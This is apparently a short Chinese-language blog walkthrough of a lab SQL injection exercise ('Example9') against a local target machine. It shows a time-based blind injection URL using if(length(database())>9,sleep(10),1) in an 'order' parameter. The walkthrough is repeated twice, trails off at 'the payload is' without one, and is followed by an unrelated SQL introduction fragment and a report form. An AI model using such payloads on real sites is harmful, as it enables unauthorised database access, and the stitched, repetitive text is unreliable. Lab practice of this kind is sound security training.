我们打开靶机,选择“SQL Injections”
选择“Example9”
观察页面
盲注的方法如下:
无回显,使用延时注入
注入点
http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
payload为
观察靶机的源代码
使用函数过滤sql查询,
可以参考网上的payload
我们打开靶机,选择“SQL Injections”
选择“Example9”
观察页面
盲注的方法如下:
无回显,使用延时注入
注入点
http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
payload为
观察靶机的源代码
使用函数过滤sql查询,
可以参考网上的payload
SQL(Structured Query Language,结构化查询语言)作为访问和操作关系数据库的标准语言,不但应用广泛,而且简单易学,因为它在设计之初就考虑了非技术人员的使用需求。 SQL 语句全都是由简单的英语单词组成;我们只需要说明自己想要的结果,然后将具体的实现交给数据库管理系统。 学习编程,你可能会犹豫选择 C++ 还是 Java;入门数据科学,你可能会纠结于选择
举报文章
请选择举报类型
补充说明
0/200
上传截图
格式支持JPEG/PNG/JPG,图片不超过1.9M